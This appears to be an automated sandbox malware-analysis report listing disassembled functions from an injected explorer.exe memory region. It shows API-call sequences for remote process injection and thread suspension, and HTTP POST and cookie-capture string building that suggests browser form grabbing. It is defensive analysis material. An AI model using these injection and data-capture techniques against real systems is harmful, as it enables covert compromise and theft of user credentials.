                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AttributesDelete
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2910425767-0
                                                                                                                                                      • Opcode ID: 743ccbb65f72696cce13965bed527d81ec338f7ac5eee066d1f036bbc51776e5
                                                                                                                                                      • Instruction ID: ea21a719a315c3645538a621d64f3b161bdf8606de1e500bbcbba49d313e16eb
                                                                                                                                                      • Opcode Fuzzy Hash: 743ccbb65f72696cce13965bed527d81ec338f7ac5eee066d1f036bbc51776e5
                                                                                                                                                      • Instruction Fuzzy Hash: FBB09232006530ABD6112B14BC0DBCE2658EF0A211B050142F701914518BD41A8286EA
                                                                                                                                                      Function 00161000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 319 161000-161010 GetProcessHeap RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: 0d1d1afc0aa975ed5d65811fe49db4050f156b6c52e0050208d2476c973625fd
                                                                                                                                                      • Instruction ID: c3837d33c8a142d6d8ce16662d87e847769cb51aad271ee81ec74b761cdcffcf
                                                                                                                                                      • Opcode Fuzzy Hash: 0d1d1afc0aa975ed5d65811fe49db4050f156b6c52e0050208d2476c973625fd
                                                                                                                                                      • Instruction Fuzzy Hash: 2EA012B14041205BDE0017A0BC0DB593518B741301F008004F34681450CDE000548720

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 00161FE5 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00161281
                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,771AE800), ref: 0016201A
                                                                                                                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00162055
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001620E5
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,001650A0,00000016), ref: 0016210C
                                                                                                                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00162134
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00162144
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0016215E
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00162166
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00162174
                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0016217B
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00162191
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00162198
                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001621AE
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001621D8
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001621EB
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001621F2
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 001621F9
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0016220D
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00162224
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00162231
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00162237
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0016223D
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00162240
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                      • String ID: 0-vw$atan$ntdll$opera_shared_counter
                                                                                                                                                      • API String ID: 1066286714-3265138137
                                                                                                                                                      • Opcode ID: a674003ed969d87af67e0b8a780f09fb0074bc8ae983ad65ac13cb90dd0ab636
                                                                                                                                                      • Instruction ID: ec7a6bed87b6534278b84ffdf6228bc506b84925b37c093b867f8dd05d2a35f5
                                                                                                                                                      • Opcode Fuzzy Hash: a674003ed969d87af67e0b8a780f09fb0074bc8ae983ad65ac13cb90dd0ab636
                                                                                                                                                      • Instruction Fuzzy Hash: 6C619871608314AFD7109F61CC84EABBBECEB88750F04062DFA49D3291DBB4DD448BA2
                                                                                                                                                      Function 0016118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 001611A9
                                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001611C1
                                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 001611C9
                                                                                                                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001611D4
                                                                                                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 001611EE
                                                                                                                                                      • wsprintfA.USER32 ref: 00161205
                                                                                                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 0016121E
                                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00161228
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                      • String ID: %02X
                                                                                                                                                      • API String ID: 3341110664-436463671
                                                                                                                                                      • Opcode ID: 400336f91e4a4d3e09a4963b22e0a2b36fcc61d8501740b2281fb7d3bce4781e
                                                                                                                                                      • Instruction ID: 1c43f80cfcaf66fb874d919be8ea2b822341701ab5354be01f03a94799d8470d
                                                                                                                                                      • Opcode Fuzzy Hash: 400336f91e4a4d3e09a4963b22e0a2b36fcc61d8501740b2281fb7d3bce4781e
                                                                                                                                                      • Instruction Fuzzy Hash: 07113D71900118BFDB119FE9EC88EEEBBBCEB45701F104065FA05E2150D7B15E91DB60
                                                                                                                                                      Function 001616C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 001616D9
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 001616E1
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001616F1
                                                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 001616FF
                                                                                                                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0016171E
                                                                                                                                                      • SuspendThread.KERNEL32(00000000), ref: 0016172E
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0016173D
                                                                                                                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0016174D
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00161758
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1467098526-0
                                                                                                                                                      • Opcode ID: 968cb53f7eada15c9cdc1f84199ec6ce99f25199a2b544c66ea9695cac6ba6e5
                                                                                                                                                      • Instruction ID: 86c201a3a907c0832bb18b6aa11832b83d8214016193d4b9fa312ab0c7cb057e
                                                                                                                                                      • Opcode Fuzzy Hash: 968cb53f7eada15c9cdc1f84199ec6ce99f25199a2b544c66ea9695cac6ba6e5
                                                                                                                                                      • Instruction Fuzzy Hash: CB11A176409221FFD7019F60AC4CAAF7BE8EF85702F050419F78592550D7B08989CBA3
                                                                                                                                                      Function 00162E1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00162EC5), ref: 00162E27
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00162E52
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00162E7F
                                                                                                                                                      • StrStrIW.SHLWAPI(?,NetworkService), ref: 00162E92
                                                                                                                                                        • Part of subcall function 00161011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,001614CB), ref: 00161020
                                                                                                                                                        • Part of subcall function 00161011: HeapFree.KERNEL32(00000000), ref: 00161027
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                                                                                                                      • String ID: NetworkService
                                                                                                                                                      • API String ID: 1656241333-2019834739
                                                                                                                                                      • Opcode ID: 1c0093451d1c67883f0b6d5040ff6f5dfa16df70d80fd4b901e50a0575891d41
                                                                                                                                                      • Instruction ID: 9fdc143dfee48026c0e886693533c9418952648fd70245332ef1cbf771058b0e
                                                                                                                                                      • Opcode Fuzzy Hash: 1c0093451d1c67883f0b6d5040ff6f5dfa16df70d80fd4b901e50a0575891d41
                                                                                                                                                      • Instruction Fuzzy Hash: 3301DF71304345BFE7246F619C45EAB3A9DEBE93A2F014029FA0AD2142DBB59CC08720
                                                                                                                                                      Function 00162974 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 157stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(?,?,?,00000000,?,001629DD,00000001), ref: 00161150
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(:method POST,?,00000000,?,001629DD,00000001), ref: 00161155
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                        • Part of subcall function 0016104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00162A16,?,00000001), ref: 00161056
                                                                                                                                                        • Part of subcall function 0016285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 001628A2
                                                                                                                                                      • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00162A4A
                                                                                                                                                      • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00162A6C
                                                                                                                                                      • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00162A8D
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 00162A96
                                                                                                                                                      • StrToIntA.SHLWAPI(00000000), ref: 00162AB9
                                                                                                                                                      • wnsprintfA.SHLWAPI ref: 00162B0D
                                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 00162B2D
                                                                                                                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 00162B35
                                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 00162B3C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                                                                                                                                      • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                                                                                                                                      • API String ID: 2605944266-950501416
                                                                                                                                                      • Opcode ID: 1b25c3e4b9c972ff413927df301e73588e47d0a911a07eccf0a1117083c8e322
                                                                                                                                                      • Instruction ID: 05252ff9b3d3793d0740f68004d60c1203ba0cdeb1907a0b3abaf49dc9d1c99a
                                                                                                                                                      • Opcode Fuzzy Hash: 1b25c3e4b9c972ff413927df301e73588e47d0a911a07eccf0a1117083c8e322
                                                                                                                                                      • Instruction Fuzzy Hash: 6851C3706043416FCB25EF64CD90A6FBBEAEFA9304F04081CF885A7296CB74DC658766
                                                                                                                                                      Function 00162FAA Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(?,?,?,00000000,?,001629DD,00000001), ref: 00161150
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(:method POST,?,00000000,?,001629DD,00000001), ref: 00161155
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 00162FFA
                                                                                                                                                      • StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00163347), ref: 00163024
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00163347), ref: 00163052
                                                                                                                                                      • wsprintfA.USER32 ref: 001630B9
                                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 001630E5
                                                                                                                                                      • lstrcat.KERNEL32(?,{:!:}), ref: 001630F8
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,00166038), ref: 00163109
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000), ref: 00163112
                                                                                                                                                        • Part of subcall function 00161011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,001614CB), ref: 00161020
                                                                                                                                                        • Part of subcall function 00161011: HeapFree.KERNEL32(00000000), ref: 00161027
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                                                                                                                      • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                                                                                                                      • API String ID: 2886538537-1627781280
                                                                                                                                                      • Opcode ID: 9d9ac0b16454fd2d74808fc4a112d63359650093191121b8d7354e87d8db7087
                                                                                                                                                      • Instruction ID: c29d63406770bf231e995e9e8fd01710a21d410c9b7f4d5d2942ac999969a6de
                                                                                                                                                      • Opcode Fuzzy Hash: 9d9ac0b16454fd2d74808fc4a112d63359650093191121b8d7354e87d8db7087
                                                                                                                                                      • Instruction Fuzzy Hash: BA31E2713043456BD704AF248C56B6F36AAEBE1742F04843CF9029B282DF75D8A587A1
                                                                                                                                                      Function 00163132 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0016322D
                                                                                                                                                      • wsprintfA.USER32 ref: 0016329E
                                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 001632AF
                                                                                                                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 001632BE
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 001632C1
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 001632D2
                                                                                                                                                        • Part of subcall function 00161011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,001614CB), ref: 00161020
                                                                                                                                                        • Part of subcall function 00161011: HeapFree.KERNEL32(00000000), ref: 00161027
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                                                                                                                      • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                                                                                                                      • API String ID: 3430864794-1604029033
                                                                                                                                                      • Opcode ID: 3b14929f01a8f0bbf0179fe7aaa8db5e9a633650968affd2e9fd42d7f6e50d08
                                                                                                                                                      • Instruction ID: 56dec84b94aec413839ddf3d9fb87ae2c7453c5ac3255fb9edcc0bab36c59c3b
                                                                                                                                                      • Opcode Fuzzy Hash: 3b14929f01a8f0bbf0179fe7aaa8db5e9a633650968affd2e9fd42d7f6e50d08
                                                                                                                                                      • Instruction Fuzzy Hash: 0B419E71108345BFD311DF10DC49EABBBECFB98345F04092EF95292251DBB59A98CBA2
                                                                                                                                                      Function 00163449 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlEnterCriticalSection.NTDLL(00166038), ref: 00163455
                                                                                                                                                      • lstrcat.KERNEL32 ref: 001634AB
                                                                                                                                                        • Part of subcall function 00162FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00162FFA
                                                                                                                                                        • Part of subcall function 00162FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00163347), ref: 00163024
                                                                                                                                                        • Part of subcall function 00162FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00163347), ref: 00163052
                                                                                                                                                        • Part of subcall function 00162FAA: wsprintfA.USER32 ref: 001630B9
                                                                                                                                                        • Part of subcall function 00162FAA: lstrcat.KERNEL32(00000000,00000000), ref: 001630E5
                                                                                                                                                        • Part of subcall function 00162F1F: CreateThread.KERNEL32(00000000,00000000,00162ED2,?,00000000,00000000), ref: 00162F2F
                                                                                                                                                        • Part of subcall function 00162F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00162F36
                                                                                                                                                        • Part of subcall function 0016105D: VirtualFree.KERNEL32(?,00000000,00008000,00162B4B), ref: 00161065
                                                                                                                                                      • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00163504
                                                                                                                                                      • StrToIntA.SHLWAPI(?,00000000,?), ref: 0016352B
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0016358D
                                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(00166038), ref: 001635C1
                                                                                                                                                        • Part of subcall function 00161274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00161281
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                                                                                                                      • String ID: $Content-Length:$POST
                                                                                                                                                      • API String ID: 2960674810-114478848
                                                                                                                                                      • Opcode ID: 1a6a7c05c0325488ac3b03c134308e6caebdd93f10c17a9ed4ef32530efa9a3a
                                                                                                                                                      • Instruction ID: 809931c6db6d8cc8bdc8c6f63087e7fe65ee0664176b6a492e38ef82e96453a7
                                                                                                                                                      • Opcode Fuzzy Hash: 1a6a7c05c0325488ac3b03c134308e6caebdd93f10c17a9ed4ef32530efa9a3a
                                                                                                                                                      • Instruction Fuzzy Hash: 46310631604341ABCB05EF64EE696AA7BA9EB95341F04003DF91397752CFB4C9ACCB91
                                                                                                                                                      Function 0016186C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                        • Part of subcall function 0016106C: lstrlen.KERNEL32(?,?,00000000,00000000,0016189F,771A8A60,?,00000000), ref: 00161074
                                                                                                                                                        • Part of subcall function 0016106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00161086
                                                                                                                                                        • Part of subcall function 001617DC: RtlZeroMemory.NTDLL(?,00000018), ref: 001617EE
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 001618FB
                                                                                                                                                      • wsprintfW.USER32 ref: 001619F2
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00161AD0
                                                                                                                                                      Strings
                                                                                                                                                      • Accept: */*Referer: %S, xrefs: 001619E8
                                                                                                                                                      • POST, xrefs: 001619A0
                                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 00161A34
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                                      • Opcode ID: 1a538062c80ffd7d964881cab05e8fe24229b886925e1a9ebbf903540339cb37
                                                                                                                                                      • Instruction ID: 9ce79382091bb0f57ee96942796e91fcb2ec6db7c06246edf714429ea8fd950d
                                                                                                                                                      • Opcode Fuzzy Hash: 1a538062c80ffd7d964881cab05e8fe24229b886925e1a9ebbf903540339cb37
                                                                                                                                                      • Instruction Fuzzy Hash: 12815875608340AFD7149FA8DC84A2BBBE9EF99344F08092DF545D3251DB70DD94CB92
                                                                                                                                                      Function 001623E3 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0016104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00162A16,?,00000001), ref: 00161056
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 001625BB
                                                                                                                                                      • lstrcat.KERNEL32(?,001642A8), ref: 001625C7
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 001625D6
                                                                                                                                                      • lstrcat.KERNEL32(?,001642AC), ref: 001625E5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$AllocVirtual
                                                                                                                                                      • String ID: :authority$?$dyn_header
                                                                                                                                                      • API String ID: 3028025275-1785586894
                                                                                                                                                      • Opcode ID: ffa44e6375e1baba235d8b2ea65e05314f9111ba71e63eeb649903b6d3d6c69a
                                                                                                                                                      • Instruction ID: 0ce998fa913733a178ba604a9b95661f3344c0a8be0dd8efd73222af5c736960
                                                                                                                                                      • Opcode Fuzzy Hash: ffa44e6375e1baba235d8b2ea65e05314f9111ba71e63eeb649903b6d3d6c69a
                                                                                                                                                      • Instruction Fuzzy Hash: 89613972508B128FC714EF24DD906AAB7E6ABA8311F44092DFCC157282DB389D1DDB63
                                                                                                                                                      Function 001628AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(?,?,?,00000000,?,001629DD,00000001), ref: 00161150
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(:method POST,?,00000000,?,001629DD,00000001), ref: 00161155
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0016291B
                                                                                                                                                      • lstrcat.KERNEL32(?,001642BC), ref: 0016292A
                                                                                                                                                      • lstrlen.KERNEL32(?,771A8A60,00000001,?,?,00000000,?,?,00162B26,?,?,?,?,00000001), ref: 0016295C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$MemoryMovelstrcat
                                                                                                                                                      • String ID: cookie
                                                                                                                                                      • API String ID: 2957667536-1295510418
                                                                                                                                                      • Opcode ID: 1e65c149d7077f48a631f72700dac0c1d7c34768ba80a769528126fbd01e34db
                                                                                                                                                      • Instruction ID: 745cd7c0dfb543ad7dabe3d44e6e0f33a9153d531b4f851f10d2da4fd05d2065
                                                                                                                                                      • Opcode Fuzzy Hash: 1e65c149d7077f48a631f72700dac0c1d7c34768ba80a769528126fbd01e34db
                                                                                                                                                      • Instruction Fuzzy Hash: 0D110A323047225BD7109A98DC95BAB76E8DBD0708F14052DF901A7281E7B1E8298390
                                                                                                                                                      Function 00161E4C Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00161E83
                                                                                                                                                      • LoadLibraryA.KERNEL32(?,00166058,00000000,00000000,771B2EE0,00000000,001620DC,?), ref: 00161EAB
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00161ED8
                                                                                                                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00161F29
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                      • String ID:
